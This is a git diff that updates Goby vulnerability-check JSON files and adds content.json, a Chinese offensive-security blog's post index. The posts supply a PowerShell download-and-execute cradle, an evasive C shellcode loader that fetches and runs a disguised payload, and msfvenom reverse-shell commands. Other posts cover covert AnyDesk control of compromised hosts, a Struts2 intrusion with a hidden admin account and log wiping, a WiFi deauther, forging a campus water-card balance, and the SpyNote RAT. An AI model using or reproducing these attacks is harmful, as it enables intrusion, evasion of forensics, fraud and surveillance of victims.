+ "uri": "/test.php", + "follow_redirect": true, + "header": null, + "data_type": "text", + "data": "", + "set_variable": [] + }, + "ResponseTest": { + "type": "group", + "operation": "AND", + "checks": [ + { + "type": "item", + "variable": "$code", + "operation": "==", + "value": "200", + "bz": "" + }, + { + "type": "item", + "variable": "$body", + "operation": "contains", + "value": "test", + "bz": "" + } + ] + }, + "SetVariable": [ + "output|lastbody|regex|" + ] + } + ], + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/alibaba_canal_default_password.json b/json/alibaba_canal_default_password.json index bd3b0b6..ee40781 100644 --- a/json/alibaba_canal_default_password.json +++ b/json/alibaba_canal_default_password.json @@ -1,18 +1,20 @@ { - "Name": "alibaba canal default password", - "Level": "3", + "Name": "Alibaba Canal Default Password", + "Level": "2", "Tags": [ "defaultaccount" ], - "GobyQuery": "(title=\"Canal Admin\"|body=\"Canal Admin Login\")", - "Description": "alibaba canal has a default password problem. Attackers can log in through admin:123456", - "Product": "Remote attacker can use this default to control the system", + "GobyQuery": "title=\"Canal Admin\" || body=\"Canal Admin Login\"", + "Description": "Alibaba Canal is Incremental log parsing based on MySQL database, providing incremental data subscription and consumption.", + "Product": "Alibaba Canal", "Homepage": "https://github.com/alibaba/canal", - "Author": "aetkrad", - "Impact": "", - "Recommendation": "", - "References": [], - "HasExp": false, + "Author": "", + "Impact": "Alibaba Canal has a default password vulnerability, an attacker can use the administrator account admin:123456 login.", + "Recommendation": "Modify Alibaba Canal administrator's default password.", + "References": [ + "https://github.com/alibaba/canal/wiki/ClientAdapter" + ], + "HasExp": true, "ExpParams": null, "ExpTips": { "Type": "", @@ -128,6 +130,6 @@ ] } ], - "PostTime": "2021-10-31 17:23:05", - "GobyVersion": "1.8.302" + "PostTime": "0000-00-00 00:00:00", + "GobyVersion": "0.0.0" } \ No newline at end of file diff --git a/json/content.json b/json/content.json new file mode 100644 index 0000000..19b3490 --- /dev/null +++ b/json/content.json @@ -0,0 +1 @@ +{"meta":{"title":"魔域魂窟","subtitle":"","description":"网络安全","author":"魂笛","url":"http://bo.vuvhz.top","root":"/"},"pages":[],"posts":[{"title":"工具整理","slug":"工具整理","date":"2022-11-30T02:34:26.000Z","updated":"2022-11-30T02:38:31.322Z","comments":true,"path":"2022/11/30/工具整理/","link":"","permalink":"http://bo.vuvhz.top/2022/11/30/%E5%B7%A5%E5%85%B7%E6%95%B4%E7%90%86/","excerpt":"","text":"#thinkphp漏洞检测工具 写文件测试默认写入根目录名为shell.php内容为的php文件,只是证明有漏洞并没有写入shell。 工具只用来验证漏洞,没有自定义命令/代码执行。 本工具只用来授权检测,未经授权的测试严禁使用本工具。 链接:https://pan.baidu.com/s/1VcfsJHAQCIJLevExNx86mA?pwd=dhc1提取码:dhc1 #Log4j2利用工具。#https://github.com/JaneMandy/Log4j2-Exp核心使用:JNDI-Injection-Exploit开发。 使用#修改Exp.py里面的参数,如Path,设置为JDK8的java的绝对路径。(如果默认java是jdk8不用设置)修改Host,如果是DOCKER,设置为能够回连到Exp为止。建议使用VPS。请确保所有端口被攻击机可以连接。确保利用成功请运行expo和靶场环境均为JDK8。如果JDK版本高于1.8.191等,请被攻击方URLCodebase参数为ture。否则攻击失败。 更新#取消掉了原有的Payload. 大家命令执行时避免命令冲突就行了,主要是直接命令行方式传入参数。如果想设置cs等等上线,建议使用长度较短的payload。 我也给大家提供了攻击环境。#Log4j2RCE为本地测试环境demo.jar为vulfocus靶场的环境,注意都需要使用jdk8运行。 #V2.1_Fofa收集工具 gayhub:https://github.com/naozibuhao/fofatools/releases/tag/V2.1 大威天龙v1.3升级到大罗法咒V2.0 变更说明: 1.更名为大罗法咒V2.0 2.项目化查询,对于同一个查询内容放在同一个tab页 3.添加自定义接口 4.鼠标右击表格内容,增加添加此查询条件 5.取消彩蛋(取消打开gayhub,播放大威天龙背景音乐) 6.还是没有导出功能,要导出的话,表格里面全选复制,然后到excel中粘贴即可 后续会在易用性上继续进行升级 #shiro工具 #自动化钓鱼文档生成工具,自带免杀效果 自动化钓鱼文档生成工具,自带免杀效果 地址:https://github.com/lengjibo/OffenSiveCSharp/tree/master/xlsmfishing 目前仅支持xlsm格式,VT上大约爆十个左右。 演示视频:https://www.bilibili.com/video/BV15v41187jw 求star、fork#Apache Solr 漏洞检测利用工具v1.1 https://www.secquan.org/Tools/1071842 Apache Solr 漏洞检测利用工具 更新了一下 主要更新: 1、增加了任意文件读取漏洞 2、修改已知bug 本工具仅供学习交流测试,请勿用于任何非法活动,本人不承担一切相关法律责任 #漏洞利用虚拟机 这东西整起来坑太多,直接发大家一份正好的虚拟机版本 我叫雷锋,虚拟机密码ubuntu 链接:https://pan.baidu.com/s/1KuGB6oOwFTZRwZEVGIZ8GA?pwd=4gtn提取码:4gtn #通达OA综合利用工具 关漏洞POC进行整合, 写成图形化工具. 本工具仅供安全测试人员运用于授权测试, 禁止用于未授权测试, 违者责任自负!!! 项目地址#https://github.com/xinyu2428/TDOA_RCE/releases #CVE-2021-21972 Vmware vCenter 图形化POC批量扫描工具 下载地址:#https://github.com/admin360bug/GUI-POC-EXP/# var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"Weblogic图形化利用工具","slug":"Weblogic图形化利用工具","date":"2022-11-30T02:14:02.000Z","updated":"2022-11-30T02:14:55.146Z","comments":true,"path":"2022/11/30/Weblogic图形化利用工具/","link":"","permalink":"http://bo.vuvhz.top/2022/11/30/Weblogic%E5%9B%BE%E5%BD%A2%E5%8C%96%E5%88%A9%E7%94%A8%E5%B7%A5%E5%85%B7/","excerpt":"","text":"#Weblogic图形化利用工具Weblogic图形化利用工具#前几天碰到一个weblogic的站发现有的工具只能执行命令不能写webshell,找到个工具集成了各个利用方法,也可以直接写内存马https://github.com/sp4zcmd/WeblogicExploit-GUI var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"anydesk进行远控","slug":"anydesk进行远控","date":"2022-11-29T04:35:03.000Z","updated":"2022-11-29T04:38:01.521Z","comments":true,"path":"2022/11/29/anydesk进行远控/","link":"","permalink":"http://bo.vuvhz.top/2022/11/29/anydesk%E8%BF%9B%E8%A1%8C%E8%BF%9C%E6%8E%A7/","excerpt":"","text":"#anydesk进行远控在进行内网渗透的时候,如果目标机器出网,但是有时候目标3389端口未开放也就表示我们无法使用远程桌面进行连接。但是依然有很多第三方远程控制软件可以帮助我们,例如Teamviewer或者AnyDesk。 本片文章我们将使用Cobalt Strike配合AnyDesk进行演示。 首先上线cs#这里我们使用powershell上线,首先我们使用Payload Generator生成一个ps1脚本 然后在目标机器上执行:(使用管理员权限执行) 1powershell "$a='IEX(New-Object Net.WebClient).Downlo';$b='11(''https://www.xxxx.tk:8443/payload.ps1'')'.Replace('11','adString');IEX ($a+$b)" 可以看到上线成功 下载anydesk#获取到权限以后 ,我们在目标机器上下载anydesk: 1powershell (New-Object System.Net.WebClient).DownloadFile(“https://download.anydesk.com/AnyDesk.exe","C:\\anydesk.exe") 我们看到anydesk已经下载到了目标主机上,这是我们先不急着打开,我们先添加他的配置文件 #生成配置文件#如果我们直接打开的话,我们不知道他的id号,也不能通过密码进行登录,更不可能直接修改,这时候我们可以先在本机生成一个配置文件,然后将配置文件拷过去。 所以我们先下载一个anydesk到本地,然后打开它,记住他的id号,例如我的就是802691146我们为自主访问设置密码在这里随便设置一个密码 然后我们将anydesk彻底关闭,退出的时候选择不安装anydesk他会自动将配置文件生成在%appdata%\\AnyDesk,也就是C:\\Users\\你的用户名\\AppData\\Roaming\\AnyDesk 我们将这四个文件保存下来,然后上传到目标主机的对应位置,务必记得保存到别处以后把本机的配置文件删除#上传配置文件并启动anydesk#在这个路径下新建一个名为AnyDesk的文件夹 然后在此文件夹下上传刚刚保存的四个配置文件 然后启动anydesk 连接测试,提示输入密码 成功连接 #注意事项#这里说一下避免踩坑的几个点: 记的在这里一定要把用户名称改成自定义,否则在那边直接会显示你的用户名 \\手动狗头 生成配置文件后将配置文件保存后记的删除配置文件,下次你重新启动anydesk的时候会自动生成并自动重新分配一个id目标主机必须有管理员权限必要时可以可以设置代理,避免让对方反制自己(由于我是用的是clash,直接代理的本地7890端口)控制目标机器后可以关闭目标机器的anydesk,但实际不会断开连接,且连接结束后会自动结束目标机器的anydesk进程,便于消除痕迹控制目标机器后记的开启禁止用户输入和启动隐私模式 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"Struts2漏洞","slug":"Struts2漏洞","date":"2022-11-29T04:23:53.000Z","updated":"2022-11-29T04:29:15.245Z","comments":true,"path":"2022/11/29/Struts2漏洞/","link":"","permalink":"http://bo.vuvhz.top/2022/11/29/Struts2%E6%BC%8F%E6%B4%9E/","excerpt":"","text":"#Struts2漏洞实战锁定目标后发现没有注入,也没有xss,也没有远程代码执行于是用检测工具,盲打,打出了Struts2,于是开始漏洞利用1.github上面有Struts2工具,拿到shell,上线冰蝎 2.然后一番周折,我的马直接被它安全管家杀掉,于是又加强了我的马,成功的绕过了安全管家,成功上线 3.查看系统信息 4.运气比较好,直接getsystem 然后建立账号net user hack$ hack /add && net localgroup hack hack$ /add 5.常规操作,想办法获取密码,不知到这是什么情况,于是我懵了,刚刚和安全管家大战2天,今天又碰到了系统问题 密码好像是加密的,哎。我还是太菜了6.然后赶紧删除记录 系统日志:%SystemRoot%\\System32\\Winevt\\Logs\\System.evtx安全日志:%SystemRoot%\\System32\\Winevt\\Logs\\Security.evtx应用程序日志:%SystemRoot%\\System32\\Winevt\\Logs\\Application.evtx日志在注册表的键:HKEY_LOCAL_MACHINE\\system\\CurrentControlSet\\Services\\Eventlog 开始→运行,输入 eventvwr 进入事件查看器,右边栏选择清除日志。 PowerShell -Command “& {Clear-Eventlog -Log Application,System,Security}” Get-WinEvent -ListLog Application,Setup,Security -Force | % {Wevtutil.exe cl $_.Logname} eventcreate -l system -so administrator -t warning -d “this is a test” -id 500 meterpreter > run event_manager -i meterpreter > run event_manager -c meterpreter > clearev 一顿操作猛如虎,一看技术两条狗 7.3389死活打不开,不知是不是安全管家搞的,于是用通道建立隧道,msf打一下内网 打完ms17-010,无果8.第二天在弄,马连接效果还是好,关机了,还能不断 获取到了hash,但是忘记截图了 aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0我尝试用hash登录,也失败了。。国庆节了,我还是没有破解开,太菜了,呜呜,大佬们可以帮我破解一下吗?小弟十分感谢啊 然后获取截图,使用社区大佬发的远程协助工具漏洞通过修改软件运行后的文档内容,二改成固定的协助码的方式,顺利登录服务器 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"wifi杀手终极版oled显示","slug":"wifi杀手终极版oled显示","date":"2022-11-29T03:53:21.000Z","updated":"2022-11-29T03:54:01.209Z","comments":true,"path":"2022/11/29/wifi杀手终极版oled显示/","link":"","permalink":"http://bo.vuvhz.top/2022/11/29/wifi%E6%9D%80%E6%89%8B%E7%BB%88%E6%9E%81%E7%89%88oled%E6%98%BE%E7%A4%BA/","excerpt":"","text":"#wifi杀手终极版oled显示https://github.com/SpacehuhnTech/esp8266_deauther/releases/tag/2.6.1#感谢spacehuhn开源#某宝240,成本26#测试效果秒杀,但是只支持2.4G频段的#制作方法:一个esp8266,一个oled屏幕,按键oled可以买IIC接口的也可以买SPI接口,SPI接口速度更快因为便宜,所以我选择IIC的 1.固件 https://github.com/SpacehuhnTech/esp8266_deauther/releases/download/2.6.1/esp8266_deauther_2.6.1_DSTIKE_DEAUTHER_OLED_V1_5.bin 2.攻击方式分为: (1)Deauth:因为WIFI管理数据帧没有被加密,导致攻击者可以伪造管理帧,从而让攻击者可以任意发送“取消认证”数据包来强行切断AP与客户端的连接(就是无脑洪水堵塞攻击,一直切断对方设备与机器的连接,从而导致对方设备无法正常连接)。 (2)Beacon:信标帧(Beacon)数据包用于宣告接入点,通过不断发送信标帧数据包(说白点就是创建许多新的wifi干扰对方的正常连接),由于目前部分设备自带SSID检测,所以我们使用随机生成SSID以达到目的。 (3)Probe-response:探测请求帧由用户设备发送,以询问一个已知网络是否在附近。通过请求您在SSID列表中指定的网络,以此来混淆WiFi跟踪器。(就是手机给已知WiFi网络发送一个probe-request帧,可提供网络服务的接入点将响应一个probe-response帧,你的手机将会跟这个响应接入点进行连接,所以看起来跟Deauth攻击差不多)。 (4)钓鱼攻击:通过伪造wifi使受害者连接假冒wifi,通过钓鱼页面等一系列手法可以实现监听流量,获取原真实wifi密码等等,在这里不多赘述和展示了。 漏洞产生原因:802.11 WiFi标准包含一种专门针对网络和连接管理的特殊帧类型,查找wifi时,被动监听WiFi热点所广播出来的“beacon”管理帧(用来表明该热点可用),而“probe-request”,你的设备会发送这种管理帧来查看之前连接过的网络当前是否在周围。如果距离内存在已访问过的网络,相应的热点将会用“probe-response”帧予以响应,这些管理帧存在的问题就是,它们完全没有经过任何的加密,这样做的目的是为了增加WiFi的易用性,因为你完全不需要进行任何的密钥交换或密码确认就可以查看到周围的WiFi网络以及热点名称,但这也增加了WiFi网络的攻击面:任何设备都可以给任何网络发送beacon帧和probe-response帧。 防御措施: 1.将进行wifi攻击的抓到打一顿,一顿不行就继续打(开个玩笑)。 2.将路由器设置发射信道使用5Ghz频段。 3.使用网线连接(手动滑稽)。 4.购买有安全防护功能的大牌路由器。 5.目前还没有什么其他更好的措施,等待新协议标准的出现。 实测 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"c语言免杀加载器","slug":"c语言免杀加载器","date":"2022-11-29T03:45:07.000Z","updated":"2022-11-29T03:52:03.609Z","comments":true,"path":"2022/11/29/c语言免杀加载器/","link":"","permalink":"http://bo.vuvhz.top/2022/11/29/c%E8%AF%AD%E8%A8%80%E5%85%8D%E6%9D%80%E5%8A%A0%E8%BD%BD%E5%99%A8/","excerpt":"","text":"#c语言免杀加载器分享一款加载器分离木马payloads测试效果 生产payloads,二进制的payloads 运行上线 测试代码可以用vs2012~vs2022,需要修改部分代码,vs2019好像不用,我是vs2019 12345678910111213141516171819202122232425262728293031323334353637383940414243444546#include "stdafx.h"#include <windows.h>#include <stdlib.h>#include <stdio.h>#include <urlmon.h>#include <string>#include <time.h>using namespace std;#pragma comment(linker,"/subsystem:\\"windows\\" /entry:\\"mainCRTStartup\\"")#include <UrlMon.h>#pragma comment(lib,"urlmon.lib")#include <tchar.h>int main(){ Sleep(182); URLDownloadToFile(NULL, _T("http://www.xxxxxx.com/shell.png"), _T("miko.png"), NULL, NULL); Sleep(168); int a; srand((unsigned)time(NULL)); a=rand()%10000+1; FILE *lp; size_t help; unsigned char* shell; Sleep(a); for(int i=0;i<3;i++){a=rand()%10000+1; Sleep(a);} lp=fopen("shell.png","rb"); Sleep(a); fseek(lp,0,SEEK_END); help=ftell(lp); fseek(lp,0,SEEK_SET); shell=(unsigned char*)malloc(help); Sleep(200); fread(shell,help,1,lp); void* exec=VirtualAlloc(0,help,MEM_COMMIT,PAGE_EXECUTE_READWRITE); memcpy(exec,shell,help); ((void(*) ())exec)(); return 0;} 前面的代码生成二进制的图片png,然后把图片放到服务器http://xxxxxx.top/miko.png,然后运行木马,木马会把payload下载到电脑然后执行,二是把图片传到本文件夹在运行这个exe加载器实现加载payload,在没有网的时候把图片放到这个里面,在有网的时候可以让他自己下载然后执行。 #方式二1.msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.1681.102 -e x86/shikata_ga_nai -i 11 -f py -o mo.py 2.msfvenom -p windows/meterpreter/reverse_tcp LHOST=vuvhz.top LPORT=8888 -e x86/shikata_ga_nai -i 11 –platform windows PrependMigrate=true PrependMigrateProc=svchost.exe -f py -o mo.py自动迁移进程到svchost.exe 3.msfvenom -p windows/meterpreter/reverse_tcp LHOST=vuvhz.top LPORT=443 -e x86/shikata_ga_nai -i 11 –platform windows PrependMigrate=true PrependMigrateProc=svchost.exe PayloadUUIDTracking=true HandlerSSLCert=/home/kali/Desktop/bd/www.baidu.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f py -o mo.py证书加自动迁移进程到svchost.exe #手机远控无后门版 资源分享 · mikoxihua · 于3年前创建 · 共 281 次阅读https://pan.baidu.com/s/1YeriXnaVpPp90AQJAr9QsA 8m3g 实测可持久,可开机自启,可隐藏#封装windows系统#对于一些需要多次装机的系统进行iso封装,可以减少不必要的麻烦,封装系统环境加所有工具,安装即用#之前用于封装系统,网上找了好多没弄理想,于是在淘宝买了这工具链接:https://pan.baidu.com/s/1IuHJnQPUhM6ZJIx3-ONjVg提取码:secq复制这段内容后打开百度网盘手机App,操作更方便哦 #445检测批量工具下载链接https://pan.baidu.com/s/1-Vgxa13ebY4AyHWyL0nj1gsecq 打开ms17-010批量扫描.bat 更改要扫描的ip段,格式为111.111.%n%.1/24 运行完成后。进入bug文件夹,打开合并bug.bat 然后打开bug.txt ctrl+F搜索“成功”。感谢大佬们发的检测工具 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"校园热水卡破解.md","slug":"校园热水卡破解","date":"2022-11-28T00:45:23.000Z","updated":"2022-11-28T00:46:37.253Z","comments":true,"path":"2022/11/28/校园热水卡破解/","link":"","permalink":"http://bo.vuvhz.top/2022/11/28/%E6%A0%A1%E5%9B%AD%E7%83%AD%E6%B0%B4%E5%8D%A1%E7%A0%B4%E8%A7%A3/","excerpt":"","text":"#校园热水卡破解(授权)本测试已经授权#1.需要的工具和设备都不用说了,某宝上可以买到正题#2.测试思路—->查看水卡信息—->找出金额的位置——>然后猜测计算算法—–>写入金额——->白嫖(当然不要违法,校方已经开始想方案了)3.这是没钱时的水卡的信息 4.这是有钱时候的水卡 5.打码的地方是学号和姓名6.发现了刷水前后的变化区域在1扇区,于是开始拿笔计算,没有接触过的我,就查了一下资料,(百度),于是按照大佬的操作测试————————>运气不好,失败告终,无法使用,水卡一直报警参照这个大佬的文章,不行https://www.52pojie.cn/thread-799755-1-1.html7.从以上文章中得出 1234567891011修改数据(每个学校水卡算法不同,此算法不一定适用你的水卡)现在将金额改成333块钱保留两位小数就是333.00去掉点33300转十六进制得8214,然后倒过来得1482然后搞定校验位1482按位取反得0B7D然后替换原金额F460替换成1482原校验位0B9F替换成0B7D (1)校验位 (2)金额 就这俩,于是拿起笔开始看,果不其然,发现我们的水卡是6个十六进制 404B4C 猜测元,角,分 于是开始计算 然后倒写,然后在求校验位,于是按位取反得00BFB4B3,刚开始写入一行,因为水卡一开始两行的数据不一样,于是我写进去后只写了一行,后来一直响,刷水还无限,于是以为金额问题,就在改,可以还是无果,于是不是金额的问题,于是尝试写两行,看到之前那篇文章的大佬也写了两行,于是写了两行后 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"安卓远控.md","slug":"安卓远控","date":"2022-11-27T08:58:34.000Z","updated":"2022-11-27T09:02:27.272Z","comments":true,"path":"2022/11/27/安卓远控/","link":"","permalink":"http://bo.vuvhz.top/2022/11/27/%E5%AE%89%E5%8D%93%E8%BF%9C%E6%8E%A7/","excerpt":"","text":"#安卓远控 spynote3.2###安卓远控 spynote3.2 简明使用教程在 freebuf看到 ‘当心,安卓远控(spynote)升级了’#遂下来自己琢磨了下 的确是非常强大 隐藏自身 目前还是过查杀的 希望大家都多多动手 然后发心得到社区中来 多多发表自己的学习心得 技术理解等让我们共同建设好 这片属于我们自己的圈子 效果图# 至少要win7以上 必须安装 .net4.5 4.5以下都不可以 java推荐是 jre 8 .net 安装不对的话 会提示 各种错误一些文件夹不存在 java版本低的话会有各种java 的意外停止 2 配置相关# 顺利打开的话 会提示 设置端口 配置木马#点击左上角 tools – bulid 然后 配置上线地址 端口 等 换个图标试试? 上线效果#上线速度很快 功能很强大 链接:https://pan.baidu.com/s/10kGm5xldOv4u-q7KMw4Vew提取码:1111 还有poc整理https://github.com/Phuong39/2022-HW-POC var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"校园网udp53端口破解免认证","slug":"校园网udp53端口破解免认证","date":"2021-10-12T11:02:27.000Z","updated":"2021-10-12T11:08:41.290Z","comments":true,"path":"2021/10/12/校园网udp53端口破解免认证/","link":"","permalink":"http://bo.vuvhz.top/2021/10/12/%E6%A0%A1%E5%9B%AD%E7%BD%91udp53%E7%AB%AF%E5%8F%A3%E7%A0%B4%E8%A7%A3%E5%85%8D%E8%AE%A4%E8%AF%81/","excerpt":"","text":"#校园网udp53端口破解免认证 安装脚本http://iyandi.xyz/wp-content/uploads/2021/10/openvpn-install-master.zip openvpn下载 http://iyandi.xyz/wp-content/uploads/2021/10/win10-2.4.9.zip 自行翻墙下载,或者使用我的###原理:此方法基本全国百分之80校园网可破解,让大家了解下校园网。本教程适用于校园网以及运营商的CMCC,chinanet,unicom。(任何需要web认证的WiFi)目前校园网破解方案: 利用udp 53/67/68/69/161/5353/6868/636/3389/123/1194 端口上网 IPv4免流上网 drcom共享网络 不排除有其他高阶方案,只列出我所了解的,比如刷路由器固件等等 原理简介 在连接到某个需要Web认证的热点后(已连接但未验证),我们已经获得了一个内网IP,此时如果我们访问某个HTTP网站,网关会对这个HTTP响应报文劫持并纂改,302重定向给我们一个web认证界面。 网关(或者说交换机)都默认放行DHCP(用于分配IP)和DNS(用于劫持用户数据报)。比如DNS用到的端口是udp53,DHCP用到的端口是udp67,68,67是服务器广播回应端口用户报文应该过不去。 破解方法: 在校外服务器搭建代理(op,dns2等),代理协议udp,代理端口 53/67/68/69/161/5353/6868/636/3389/123/1194等等端口 ###正题1.openvpn服务端安装 bash openvpn-install.sh 2.设置ip 3.名字随便写 如上图配置完成 4.名字随便 5.添加用户名 6.复制配置文件到openvpn客户端连接,一定要关闭防火墙,打开53端口 成功突破校园网,不用在办理非常非常贵的宽带了,太黑了,有些学校是其他端口,搭建服务器该端口就可以了 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"MFC社工利器","slug":"MFC社工利器","date":"2021-09-17T13:50:32.000Z","updated":"2021-09-17T13:51:12.701Z","comments":true,"path":"2021/09/17/MFC社工利器/","link":"","permalink":"http://bo.vuvhz.top/2021/09/17/MFC%E7%A4%BE%E5%B7%A5%E5%88%A9%E5%99%A8/","excerpt":"","text":"MFC社工利器就他了,第一个,qq右上角复制qq看点链接# 然后打开我的软件 qq看点到手机号,微博一条龙 var gitalk = new Gitalk({ clientID: 'a5bfaa7fddf1c19628f6', clientSecret: '6a1973c92b65bf565b673300ed94c1d07b827727', repo: 'renzhonglin.github.io', owner: 'renzhonglin', admin: 'renzhonglin', id: md5(location.pathname), // Ensure uniqueness and length less than 50 distractionFreeMode: false // Facebook-like distraction free mode }) gitalk.render('gitalk-container')","categories":[],"tags":[]},{"title":"esp8266+blinker+小爱同学控制4到8个设备源码","slug":"esp8266+blinker的app+小爱同学控制4到8个设备源码","date":"2021-09-17T13:48:28.000Z","updated":"2021-09-17T13:48:29.257Z","comments":true,"path":"2021/09/17/esp8266+blinker的app+小爱同学控制4到8个设备源码/","link":"","permalink":"http://bo.vuvhz.top/2021/09/17/esp8266+blinker%E7%9A%84app+%E5%B0%8F%E7%88%B1%E5%90%8C%E5%AD%A6%E6%8E%A7%E5%88%B64%E5%88%B08%E4%B8%AA%E8%AE%BE%E5%A4%87%E6%BA%90%E7%A0%81/","excerpt":"","text":"esp8266+blinker的app+小爱同学控制4到8个设备源码 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295#define BLINKER_MIOT_MULTI_OUTLET //设置为小爱多个插座的模式#define BLINKER_PRINT Serial#define BLINKER_PRINT Serial#define BLINKER_WIFI#include <Blinker.h>#define Socket1 D5#define Socket2 D6#define Socket3 D7#define Socket4 D8char auth[] = "***************";/****秘钥****/char ssid[] = "****************"; //wifi名字char pswd[] = "************"; // wifi密码char Port;int Feedback = 0;int OnorOff = 0;long F_time = 0;int count=0;bool WIFI_Status = true;// 新建组件对象BlinkerButton Button1("k1"); //设置blinkerapp内数据键名BlinkerButton Button2("k2");BlinkerButton Button3("k3");BlinkerButton Button4("k4");void smartConfig()//配网函数{ WiFi.mode(WIFI_STA); Serial.println("\\r\\nWait for Smartconfig..."); WiFi.beginSmartConfig();//等待手机端发出的用户名与密码 while (1) { Serial.print("."); digitalWrite(LED_BUILTIN, HIGH); delay(1000); digitalWrite(LED_BUILTIN, LOW); delay(1000); if (WiFi.smartConfigDone())//退出等待 { Serial.println("SmartConfig Success"); Serial.printf("SSID:%s\\r\\n", WiFi.SSID().c_str()); Serial.printf("PSW:%s\\r\\n", WiFi.psk().c_str()); break; } }}void WIFI_Set()//{ //Serial.println("\\r\\n正在连接"); while(WiFi.status()!=WL_CONNECTED) { if(WIFI_Status) { Serial.print("."); digitalWrite(LED_BUILTIN, HIGH); delay(500); digitalWrite(LED_BUILTIN, LOW); delay(500); count++; if(count>=5)//5s { WIFI_Status = false; Serial.println("WiFi连接失败,请用手机进行配网"); } } else { smartConfig(); //微信智能配网 } } /* Serial.println("连接成功"); Serial.print("IP:"); Serial.println(WiFi.localIP());*/}void Set_Butt(int num) //on反馈{ if (num == 1) { Button1.print("on"); } else if (num == 2) { Button2.print("on"); } else if (num == 3) { Button3.print("on"); } else if (num == 4) { Button4.print("on"); } }void Reset_Butt(int num) //off反馈{ if (num == 1) { Button1.print("off"); } else if (num == 2) { Button2.print("off"); } else if (num == 3) { Button3.print("off"); } else if (num == 4) { Button4.print("off"); } }void miotPowerState(const String & state, uint8_t num) //小爱控制函数{ BLINKER_LOG("need set outlet: ", num, ", power state: ", state); if (num == 1) { Feedback = 1; Port = Socket1; //指定每一路开关对应在开发板上的通道接口 } else if (num == 2) { Feedback = 2; Port = Socket2; } else if (num == 3) { Feedback = 3; Port = Socket3; } else if (num == 4) { Feedback = 4; Port = Socket4; } if (state == BLINKER_CMD_ON) { OnorOff = 1; if(num == 0) { Feedback = 5; digitalWrite(Socket1, HIGH); digitalWrite(Socket2, HIGH); digitalWrite(Socket3, HIGH); digitalWrite(Socket4, HIGH); } else { digitalWrite(Port, HIGH); } BlinkerMIOT.powerState("on", num); BlinkerMIOT.print(); } else if (state == BLINKER_CMD_OFF) { OnorOff = 2; if(num == 0) { Feedback = 5; digitalWrite(Socket1, LOW); digitalWrite(Socket2, LOW); digitalWrite(Socket3, LOW); digitalWrite(Socket4, LOW); } else { digitalWrite(Port, LOW); } BlinkerMIOT.powerState("off", num); BlinkerMIOT.print(); }}void button1_callback(const String & state) //点灯app内控制按键触发{ BLINKER_LOG("get button state: ", state); if (state == "on") { digitalWrite(Socket1, HIGH); 